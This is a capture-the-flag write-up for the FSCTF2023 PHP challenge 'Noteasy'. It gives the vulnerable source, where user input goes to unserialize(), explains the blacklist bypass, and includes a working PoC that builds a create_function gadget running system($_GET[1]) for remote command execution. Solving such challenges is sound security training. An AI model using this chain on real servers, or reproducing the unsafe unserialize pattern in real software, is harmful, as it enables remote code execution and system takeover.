题目（index.php 源码，反序列化入口 + `__destruct` 中的动态函数调用）

<?php
class Noteasy
{
    // Both properties are attacker-controlled: unserialize() (see the top-level
    // code below) restores them verbatim from untrusted input. `protected` only
    // changes the serialized property name (it gets a "\0*\0" prefix); it does
    // not stop an attacker from setting the value.
    protected $param1;
    protected $param2;

    // Sink. Runs automatically when the unserialized object is freed, so the
    // attacker needs nothing beyond the single unserialize() call.
    function __destruct()
    {
        $a = $this->param1;   // function name to call -- not filtered at all
        $b = $this->param2;   // second argument -- the only value that is filtered
        // Case-insensitive substring blacklist applied to $b only. Note what it
        // does NOT cover: `}`, `;`, `$`, `_`, `[`, `]`, `(`, `)`, `/` and the
        // word `system` -- enough for a create_function-based chain.
        if (preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\*|\||\<|\"|\'|\=|\?|sou|\.|log|scan|chr|local|sess|b2|id|show|cont|high|reverse|flip|rand|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|y2f/i', $this->param2)) {
            die('this param is error!');
        } else {
            // Dynamic call: attacker-chosen callee, fixed first argument '',
            // attacker-chosen second argument. With $a = 'create_function' the
            // second argument is eval'd as a function body (PHP < 8 only;
            // create_function was removed in PHP 8.0).
            $a('', $b);
        }
    }
}
if (!isset($_GET['file'])) {
    // No parameter: print the challenge source and a greeting.
    show_source('index.php');
    echo "Hi!Welcome to FSCTF2023!";
} else {
    // Vulnerable entry point: untrusted GET data is base64-decoded and passed
    // straight to unserialize(). Any class in scope with a magic method (here
    // Noteasy::__destruct) becomes a gadget. The return value is discarded, so
    // the object is destroyed -- and __destruct fires -- right away.
    // Note base64_decode() is used in non-strict mode here, which silently
    // discards characters outside the base64 alphabet; a '+' that was turned
    // into a space by URL decoding is dropped rather than rejected, so the
    // payload should be URL-encoded when placed in the query string.
    $file = base64_decode($_GET['file']);
    unserialize($file);
}

一眼丁真：`unserialize()` 直接反序列化用户输入，`Noteasy::__destruct` 里的 `$a('', $b)` 是一个完全可控的动态函数调用，而 `$a` 本身不经过任何过滤。令 `$a = create_function`：`create_function($args, $code)` 会把 `$code` 拼进 `function(){ ... }` 后 eval，所以 `$b` 用 `}` 提前闭合函数体，紧随其后的 `system($_GET[1]);` 在“定义”时就立即执行，末尾的 `//` 注释掉多出来的 `}`。黑名单没有拦 `}`、`;`、`$`、`_`、`[`、`]`、`(`、`)`、`/` 和 `system` 这个词，因此 preg_match 不会命中。属性是 `protected`，序列化后属性名带 `\0*\0` 前缀，这也是题目用 base64 传参的原因。注意 `create_function` 在 PHP 7.2 被废弃、8.0 被移除，这条链只对 PHP < 8 的目标有效；命令通过 `&1=...` 传入。

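/**
 * Gadget object for the Noteasy chain.
 *
 * Only the property names and values matter: serialize() emits data, not
 * methods, and it is the target's own __destruct() that runs after
 * unserialize() on the server. The target's destructor is therefore NOT
 * reproduced here. In the original PoC it was copied verbatim, which meant it
 * also fired on the attacker's machine when the temporary object was freed:
 * on PHP < 8 that runs create_function()/system() locally, on PHP >= 8
 * (create_function was removed in 8.0) the script dies with a fatal error
 * after the payload has already been printed.
 *
 * The properties must stay `protected` so the serialized form carries the
 * "\0*\0" name prefix that matches the target's class definition.
 */
class Noteasy
{
    // Callee for the target's `$a('', $b)`. create_function($args, $code)
    // evals "function(){ $code }", so $b runs as PHP. Requires PHP < 8.
    protected $param1 = "create_function";

    // `}` closes the generated function body early so `system($_GET[1]);`
    // executes at definition time; `//` comments out the trailing `}`.
    // Built only from characters and words absent from the target's blacklist
    // (`}`, `;`, `$`, `_`, `[`, `]`, `(`, `)`, `/`, "system").
    // The command is supplied via ?1=<cmd> on the target.
    protected $param2 = "};system(\$_GET[1]);//";
}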

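// Emit the gadget ready to paste as ?file=... . The base64 alphabet includes
// '+', '/' and '=', which are not query-string-safe: a raw '+' is decoded to a
// space by the server, and the target's non-strict base64_decode() then drops
// it silently, corrupting the serialized object. urlencode() avoids that;
// PHP URL-decodes $_GET on the target, so base64_decode() sees the original.
echo urlencode(base64_encode(serialize(new Noteasy())));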